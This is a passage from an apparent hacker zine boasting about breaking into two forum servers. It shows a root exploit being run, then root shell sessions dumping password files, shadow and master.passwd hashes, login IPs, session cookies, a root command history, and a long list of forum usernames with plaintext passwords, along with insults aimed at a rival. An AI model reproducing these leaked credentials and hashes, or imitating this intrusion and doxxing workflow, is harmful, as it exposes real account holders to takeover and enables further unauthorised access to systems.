+ +GET /board/showthread.php?t=37267 HTTP/1.1 +Host: zion-network.net +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Connection: keep-alive +Referer: http://zion-network.net/board/forum.php +Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005 + +^C +# + +DONE! Of course we don't need to rely on such methods, we simply do +something like this: + + |\ .(' *) ' .................... + | \ ' .*) .'* $ ./getroot zion-network.net + |(*\ .*(// .*) .# id ...................... + |___\ // (. '*.# uid=0(root)... + ((("'\ // ' * .......... + ((c'7') /\) ,. . ., + ((((^)) / \ ,. ,, + .-')))(((-' / , + (((()) __/' + )))( | + (() + )) + +It's black magic ... can you smell the fume? ... 
+ +# uname -a +Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux + +# cat /etc/issue +Debian GNU/Linux 6.0 \n \l + +# id +uid=0(root) gid=0(root) groups=0(root) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +Debian-exim:x:101:103::/var/spool/exim4:/bin/false +statd:x:102:65534::/var/lib/nfs:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +user:x:1000:1000:user,,,:/home/user:/bin/bash +mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false +ntp:x:105:107::/home/ntp:/bin/false +messagebus:x:106:108::/var/run/dbus:/bin/false +dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash + +# cat /etc/shadow +root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7::: +daemon:*:15248:0:99999:7::: +bin:*:15248:0:99999:7::: +sys:*:15248:0:99999:7::: +sync:*:15248:0:99999:7::: +games:*:15248:0:99999:7::: +man:*:15248:0:99999:7::: +lp:*:15248:0:99999:7::: +mail:*:15248:0:99999:7::: +news:*:15248:0:99999:7::: +uucp:*:15248:0:99999:7::: +proxy:*:15248:0:99999:7::: +www-data:*:15248:0:99999:7::: +backup:*:15248:0:99999:7::: +list:*:15248:0:99999:7::: +irc:*:15248:0:99999:7::: +gnats:*:15248:0:99999:7::: 
+nobody:*:15248:0:99999:7::: +libuuid:!:15248:0:99999:7::: +Debian-exim:!:15248:0:99999:7::: +statd:*:15248:0:99999:7::: +sshd:*:15248:0:99999:7::: +user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7::: +mysql:!:15248:0:99999:7::: +ntp:*:15248:0:99999:7::: +messagebus:*:15248:0:99999:7::: +dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7::: + +# last +root pts/0 host-static-93-1 Thu Oct 13 03:48 gone - no logout +root pts/0 178.122.33.104 Wed Oct 12 03:58 - 03:48 (23:50) +root pts/0 83.246.185.93 Tue Oct 4 22:47 - 03:58 (7+05:11) +root pts/0 83.246.185.93 Tue Oct 4 22:46 - 22:47 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:44 - 22:46 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:43 - 22:44 (00:00) +root pts/0 83.246.185.93 Tue Oct 4 22:38 - 22:43 (00:04) +root pts/0 83.246.185.93 Tue Oct 4 22:37 - 22:38 (00:01) +root pts/0 85.121.52.21 Tue Oct 4 22:20 - 22:37 (00:16) +root pts/0 178.124.12.137 Tue Oct 4 22:14 - 22:20 (00:06) +root pts/0 188.24.19.198 Tue Oct 4 20:19 - 22:14 (01:55) +root pts/0 188.24.19.198 Tue Oct 4 20:16 - 20:19 (00:02) +root pts/1 80.242.104.93 Sun Oct 2 17:55 gone - no logout +root pts/1 80.242.104.93 Sun Oct 2 17:43 - 17:55 (00:11) +root pts/3 79.112.62.66 Sun Oct 2 16:11 gone - no logout +root pts/0 80.242.104.93 Sun Oct 2 14:50 - 20:16 (2+05:25) + +# alias ls="ls -la" + +# ls +total 64 +drwx------ 3 root root 4096 Oct 2 14:12 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. +drwx------ 2 root root 4096 Oct 1 09:23 .aptitude +-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rwxrwxrwx 1 root root 41394 Oct 1 17:16 mysqltuner.pl + +# cd /home + +# ls +total 16 +drwxr-xr-x 4 root root 4096 Oct 1 18:32 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. 
+drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 dfg435345fgu03 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 user + +# cd dfg435345fgu03 + +# ls +total 20 +drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 220 Oct 1 18:32 .bash_logout +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct 1 18:32 .bashrc +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 675 Oct 1 18:32 .profile + +# cd .. + +# cd user + +# ls +total 20 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 user user 220 Oct 1 09:24 .bash_logout +-rw-r--r-- 1 user user 3184 Oct 1 09:24 .bashrc +-rw-r--r-- 1 user user 675 Oct 1 09:24 .profile + +# Nothing to see here :(^C + +# cd /var/www + +# ls +total 20 +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 . +drwxr-xr-x 16 root root 4096 Oct 2 14:37 .. +drwxr-xr-x 17 root root 4096 Oct 2 14:25 board +-rw-r--r-- 1 root root 111 Oct 2 05:54 index.php +-rw-r--r-- 1 root root 1200 Oct 2 04:29 robots.txt + +# cd board + +# ls -la +total 2604 +drwxr-xr-x 17 root root 4096 Oct 2 14:25 . +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 .. 
+-rw-r--r-- 1 root root 12292 May 17 2010 .DS_Store +-rw-r--r-- 1 root root 70 May 17 2010 ._.DS_Store +-rw-r--r-- 1 root root 19541 Sep 24 11:16 LICENSE +-rw-r--r-- 1 root root 44905 Sep 24 11:16 ajax.php +-rw-r--r-- 1 root root 75977 Sep 24 11:16 album.php +-rw-r--r-- 1 root root 19375 Sep 24 11:16 announcement.php +-rw-r--r-- 1 root root 4269 Sep 24 11:16 api.php +-rw-r--r-- 1 root root 3862 Sep 24 11:16 apichain.php +drwxr-xr-x 2 root root 4096 Oct 1 15:06 archive +-rw-r--r-- 1 root root 8745 Sep 24 11:16 asset.php +-rw-r--r-- 1 root root 20438 Sep 24 11:16 assetmanage.php +-rw-r--r-- 1 root root 15831 Sep 24 11:16 attachment.php +-rw-r--r-- 1 root root 6690 Sep 24 11:16 attachment_inlinemod.php +-rw-r--r-- 1 root root 1960 Sep 25 10:03 banlist.php +-rw-r--r-- 1 root root 3657 Sep 24 11:16 blog_attachment.php +-rw-r--r-- 1 root root 96572 Sep 24 11:16 calendar.php +-rw-r--r-- 1 root root 3336 Sep 24 11:16 ckeditor.php +-rw-r--r-- 1 root root 43 Sep 24 11:16 clear.gif +drwxr-xr-x 11 root root 4096 Oct 1 15:09 clientscript +-rw-r--r-- 1 root root 15382 Sep 24 11:16 converse.php +drwxr-xr-x 7 root root 4096 Oct 1 15:09 cpstyles +-rw-r--r-- 1 root root 3263 Sep 24 11:16 cron.php +-rw-r--r-- 1 root root 6206 Sep 24 11:16 css.php +drwxrwxrwx 3 root root 36864 Oct 2 10:09 customavatars +drwxr-xr-x 3 root root 4096 Oct 1 15:09 customgroupicons +drwxrwxrwx 2 root root 20480 Oct 2 07:58 customprofilepics +-rw-r--r-- 1 root root 1739 Sep 24 11:16 editor.php +-rw-r--r-- 1 root root 47262 Sep 24 11:16 editpost.php +-rw-r--r-- 1 root root 1355 Sep 24 11:16 entry.php +-rw-r--r-- 1 root root 30313 Sep 24 11:16 external.php +-rw-r--r-- 1 root root 9920 Sep 24 11:16 faq.php +-rw-r--r-- 1 root root 10134 Sep 24 11:16 favicon.ico +-rw-r--r-- 1 root root 22480 Sep 24 11:16 forum.php +-rw-r--r-- 1 root root 43139 Sep 24 11:16 forumdisplay.php +-rw-r--r-- 1 root root 2025 Sep 24 11:16 global.php +-rw-r--r-- 1 root root 152626 Sep 24 11:16 group.php +-rw-r--r-- 1 root root 26181 Sep 
24 11:16 group_inlinemod.php +-rw-r--r-- 1 root root 11362 Sep 24 11:16 groupsubscription.php +-rw-r--r-- 1 root root 9016 Sep 24 11:16 image.php +drwxr-xr-x 26 root root 4096 Oct 1 15:10 images +drwxr-xr-x 9 root root 12288 Oct 1 19:34 includes +-rw-r--r-- 1 root root 114 Oct 2 05:57 index.php +-rw-r--r-- 1 root root 47257 Sep 24 11:16 infraction.php +-rw-r--r-- 1 root root 187319 Sep 24 11:17 inlinemod.php +-rw-r--r-- 1 root root 6831 May 14 02:43 itrader.php +-rw-r--r-- 1 root root 15395 Aug 25 15:30 itrader_detail.php +-rw-r--r-- 1 root root 12933 Aug 25 14:14 itrader_feedback.php +-rw-r--r-- 1 root root 1405 Apr 21 03:45 itrader_global.php +-rw-r--r-- 1 root root 23116 Aug 25 17:15 itrader_main.php +-rw-r--r-- 1 root root 3970 Apr 21 03:45 itrader_report.php +-rw-r--r-- 1 root root 1779 Aug 6 06:47 jabber.php +-rw-r--r-- 1 root root 11697 Sep 24 11:16 joinrequests.php +-rw-r--r-- 1 root root 1675 Sep 24 11:17 list.php +-rw-r--r-- 1 root root 11055 Sep 24 11:17 login.php +-rw-r--r-- 1 root root 30872 Sep 24 11:17 member.php +-rw-r--r-- 1 root root 16346 Sep 24 11:17 member_inlinemod.php +-rw-r--r-- 1 root root 40089 Sep 24 11:17 memberlist.php +drwxr-xr-x 6 root root 4096 Oct 1 15:10 mgc_cb_evo +-rw-r--r-- 1 root root 60012 May 17 2010 mgc_cb_evo.php +-rw-r--r-- 1 root root 49969 Sep 25 13:43 mgc_cb_evo_ajax.php +-rw-r--r-- 1 root root 22218 Sep 24 11:17 misc.php +-rw-r--r-- 1 root root 5866 Sep 24 11:17 mobile.php +-rw-r--r-- 1 root root 76344 Sep 24 11:17 moderation.php +-rw-r--r-- 1 root root 6733 Sep 24 11:17 moderator.php +-rw-r--r-- 1 root root 17516 Sep 24 11:17 newattachment.php +-rw-r--r-- 1 root root 41424 Sep 24 11:17 newreply.php +-rw-r--r-- 1 root root 20622 Sep 24 11:17 newthread.php +-rw-r--r-- 1 root root 21562 Sep 24 11:17 online.php +drwxr-xr-x 7 root root 4096 Oct 1 15:10 packages +-rw-r--r-- 1 root root 8526 Sep 24 11:17 payment_gateway.php +-rw-r--r-- 1 root root 13314 Sep 24 11:17 payments.php +-rw-r--r-- 1 root root 4016 Sep 24 11:17 
picture.php +-rw-r--r-- 1 root root 16619 Sep 24 11:17 picture_inlinemod.php +-rw-r--r-- 1 root root 26550 Sep 24 11:17 picturecomment.php +-rw-r--r-- 1 root root 29311 Sep 24 11:17 poll.php +-rw-r--r-- 1 root root 10318 Sep 24 11:17 posthistory.php +-rw-r--r-- 1 root root 76497 Sep 24 11:17 postings.php +-rw-r--r-- 1 root root 7037 Sep 24 11:17 printthread.php +-rw-r--r-- 1 root root 81357 Sep 24 11:17 private.php +-rw-r--r-- 1 root root 163788 Sep 24 11:17 profile.php +-rw-r--r-- 1 root root 56552 Sep 24 11:17 register.php +-rw-r--r-- 1 root root 7248 Sep 24 11:17 report.php +-rw-r--r-- 1 root root 14719 Sep 24 11:17 reputation.php +-rw-r--r-- 1 root root 127 Sep 26 02:58 rules.php +-rw-r--r-- 1 root root 35091 Sep 24 11:17 search.php +-rw-r--r-- 1 root root 22872 Sep 24 11:17 sendmessage.php +-rw-r--r-- 1 root root 12879 Sep 24 11:17 showgroups.php +-rw-r--r-- 1 root root 12806 Sep 24 11:17 showpost.php +-rw-r--r-- 1 root root 82207 Sep 24 11:17 showthread.php +drwxrwxrwx 2 root root 4096 Oct 1 17:57 signaturepics +drwxr-xr-x 2 root root 4096 Oct 1 15:10 store_sitemap +-rw-r--r-- 1 root root 39241 Sep 24 11:17 subscription.php +-rw-r--r-- 1 root root 5353 Sep 24 11:17 tags.php +-rw-r--r-- 1 root root 8754 Sep 24 11:17 threadrate.php +-rw-r--r-- 1 root root 11104 Sep 24 11:17 threadtag.php +-rw-r--r-- 1 root root 61 Sep 24 11:17 uploadprogress.gif +-rw-r--r-- 1 root root 39671 Sep 24 11:17 usercp.php +-rw-r--r-- 1 root root 21703 Sep 24 11:17 usernote.php +drwxr-xr-x 13 root root 4096 Oct 1 15:10 vb +-rw-r--r-- 1 root root 28505 Sep 24 11:17 visitormessage.php +-rw-r--r-- 1 root root 126 Jul 10 18:23 vv.php +-rw-r--r-- 1 root root 1679 Sep 24 11:17 widget.php +-rw-r--r-- 1 root root 3801 Sep 24 11:17 xmlsitemap.php +drwxr-xr-x 3 root root 4096 Oct 1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu +drwxr-xr-x 2 root root 4096 Oct 1 15:10 zzzsf84bfsadifubSIDFUB48bf + +# head -n75 includes/config.php + +elax:jessica +emdre:lunartec1 +fair_playa77:J6Dm8hFhJ6Dm8hFh 
+fakedMe:eileen13 +fakerboy:frankycrew12345 +fallout:wazzzappsp3 +flon203:flon@Nex +glow:amolacar1994+#!Asdf +hades:hi1337 +hakan123:hakan +heisenb6rg:3e2w1q +homouus:lolfisch +homouus:lolfische +iks:noji987 +jannizzz:lol123 +johnlopez:948nF)§(J03kd09j3 +kaye:kaye1234 +knell:novn7L8n +krillewurm:manfred2711 +krono§:1337return1337 +kryptôn:123456789ss +lasdas:123456 +leonard:wj0oU3QJr7pgZ +lolboter:lila123 +lowbird:3mksu92k=DAK"=)213s +lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH +misanthrop:vju4S4KSthdUD +miss.marpel:m4NnrxfZ6QbbyhZc +mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c +mr. CC:Ficken1337 +mr.montana:46samira46 +muti:fuckthatshitinass22 +n1312:JKjd(()&%hf%&g837gdf +neocrow:6/4=)6$§61%)6/=1/ +nighter:Six6Pack +ooops:ichkommauskielderstadtammeer241985 +paco:13xqextraordinary37 +paulpanzer:159159159 +pelikan:B3v8aZPS +phen:utecpnkq6512429myaccount! +prosto:16471647 +ps24h:Q!ä?-sK2%8AcfÜ2.=% +purplera1n:rg5hg54gh45hg +r4nd0m:fuckyou1 +rabbit:nSRXQm3G +rad0n:12345 +reQ:Mesum3565me35650108e711lol +romulus:v678rheberhbeg +sani:19n4schk4tz385 +sips:5hgedhtbdh +slic3menic3:DkWLjh8G +snoppy0066:pueppyi1AA +sqli~hoe:ArZt1994 +st3aLth:1337!Aa +td4s:1qaz2wsx +th3p0is0n:th3p0is0nrules1337 +till7:peter123 +tivja:fabuge28 +trixx:makemoney! +unnex:selfmode3 +vendor84453:15zocker15 +veryanonym:wasnhierlosman1991 +vittula:oddset06 +wacked2:klfGKDfksdmfoc5§io +wastl:wastl24 +xK1NG:xhu12101995xier +xTonyStylesx:pol1pol2 +z4pz4r4p:AzzarackAttack +zionnoob:123456 + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========{ Hackbase.cc }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We can't say much here because we would start ~ | ||( );, +repeating ourselves. But anyway, on Hackbase.cc ( ,;.)-\ / ';, +the banner says "Hacking, Carding & more". Don't \ ( \ ( +ask why we owned them; the community and that || \\ +banner begged for it. By now you know our moti- /_( /_( +vation, you know our goals, deal with it. +But there is something else which was a thorn in our side. 
It seems +that Easy Laster aka ea former admin of Free-Hack (after we owned +them), hosts his 4004-Security-Project on Hackbase's server. +4004-security-project.com was a blog on that Easy constantly posts +horribly lame exploits for all kind of webapps that nobody uses while +thinking that by publishing all this bullshit he'd actually help +people. Actually it's a known fact that he sucks all kinds of cock for +vulnerabilities to put on exploit-db, just check it out: +exploit-db.com/author/?a=2201. It's hilarious and more than obvious +that he is one of those kids that try to inject a ' into every +parameter on a website. Here is what you get. + + +# uname -a +FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post 
Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin +secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin +testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin +224422:*:1004:1004:User &:/home/224422:/sbin/nologin +testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin +union:*:1006:1006:User &:/home/union:/sbin/nologin +hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP 
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin +secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin +testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin +224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin +testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin +union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin +hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin + +# pwd +/root + +# ls -la +total 6292 +drwxr-xr-x 4 root wheel 512 Sep 29 09:07 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. 
+-rw------- 1 root wheel 10971 Oct 4 14:44 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 5249 Sep 30 21:55 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 71 Jul 5 15:47 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Sep 29 09:07 .mc +-rw------- 1 root wheel 18 Jul 21 17:26 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Mar 10 2010 .ssh +-rw-r--r-- 1 root wheel 0 Jul 5 15:46 ec1902 +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +-rw-r--r-- 1 root wheel 476 Sep 2 06:37 forsirius.conf +-rw-r--r-- 1 root wheel 3150763 Feb 21 2011 ioncube_loaders_fre_8_x86-64.tar.gz + +# cat .bash_history +make install clean +cd /usr/ports/devel/ZendOptimizer/ +make install clean +mc -d +cd /usr/ports/ +search name=eaccelerator +make search name=eaccelerator +cd /usr/ports/www/eaccelerator +make install clean +mkdir /tmp/eaccelerator +chown www /tmp/eaccelerator +chmod 0700 /tmp/eaccelerator +mc -d +cd /usr/ports/ +make search name=ioncube +cd /usr/ports/devel/ioncube +make install clean +mc -d +cd /usr/ports/lang/php52-extensions/ +make install clean +pkg_version -vIL= +php -v +php -m +php -v +php -m +history +php -v +mc +php -v +php -v +mc +php -m +mc +mc +pkg_info|grep ioncube +pkg_info|grep php +mc -d +ifconfig +apachectl start +mc -d +fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz +php loader-wizard.php +rm loader-wizard.php +cd /usr/ports/devel/ioncube/ +make clean +make +/usr/local/etc/rc.d/nginx start +mcedit -d /etc/rc.conf +/usr/local/etc/rc.d/nginx start +ifconfig +apachectl restart +ps ax|grep apache +ps ax|grep http +apachectl start +ps ax|grep http +cat /var/log/httpd/httpd_error.log +cat /var/log/httpd/httpd_error.log +apachectl start +ps ax|grep http +apachectl stop +apachectl start +php -v +cd / +php -v +php -v +/usr/local/etc/rc.d/nginx stop 
+/usr/local/etc/rc.d/apache22 restart +exit +edit /etc/rc.conf +exit +ps ax +cd /home/ +ls -l +cd webserver/ +ls -l +ls -l +mc +sockstat -l4 +vi /etc/rc.conf +jls +mc +apachectl restart +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +ls -la /home +ls -la /home/webserver/ +ls -la /home/webserver/free-hack.in/ +ls -la /home/webserver/free-hack.in/msd1/ +chmod -R 755 /home/webserver/ +exit +mcedit /etc/my.cnf +/usr/local/etc/rc.d/mysql-server restart +exit +mc +/usr/local/etc/rc.d/mysql-server restart +mcedit /usr/local/etc/php.ini +apachectl restart +php -m +php -v +exit +passwd +exit +passwd +tail -f /var/log/httpd/httpd_access.log +top +ps ax | grpe http | wc -l +ps ax | grep http | wc -l +tail -f /var/log/httpd/httpd_access.log +top +mysql -uroot -p`cat /etc/my.passwd ` +uname -a +mailq +postsuper -D ALL +postsuper -d ALL +mailq +/usr/local/etc/rc.d/mysql-server restart +mysql -uroot -p`cat /etc/my.passwd ` +mc +gstat +ps auxf +ifconfig +ee /usr/local/etc/apache22/httpd.conf +ee /usr/local/etc/nginx/nginx.conf +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/nginx restart +/usr/local/etc/rc.d/nginx stop +ifconfig +ifconfig +head /usr/local/etc/apache22/httpd.conf +ps auxf +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/freakyfreehack/ +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/secunet/ +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +ifconfig +mc +ps wauxf +ifconfig +tail -f /var/log/httpd/httpd_access.log | grep server +killall -9 tail +tail -100 /var/log/httpd/httpd_access.log | grep server +ps wauxf +tail -1-00 /var/log/httpd/httpd_access.log | grep server +tail -1000 /var/log/httpd/httpd_access.log | grep server +ps wauxf +history +ps ax | grep http | wc 
-l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +/usr/local/etc/rc.d/apache22 restart +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +mc +apachectl restart +apachectl stop +apachectl start +top +/usr/local/etc/rc.d/apache22 restart +top +head /usr/local/etc/apache22/httpd.conf +ps wauxf +ps wauxf | gre nginx +ps wauxf | grep nginx +cd /home/ +grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/* +cd /home/forsirius/testsite15.w2c.ru +ls -la +grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/* +grep w2c.ru /usr/local/etc/apache22/vhosts/* +cd /home/forsirius/testsite15.w2c.ru +ls -la +ifconfig +cd .. +ls -la +cd .. +ls -la +mc +cd /home/forsirius/testsite.w2c.ru +grep w2c.ru /usr/local/etc/apache22/vhosts/* +ifconfig +cat /etc/rc.conf +cat /etc/rc.conf +ifconfig +cat /etc/rc.conf +cat /etc/rc.local +cat 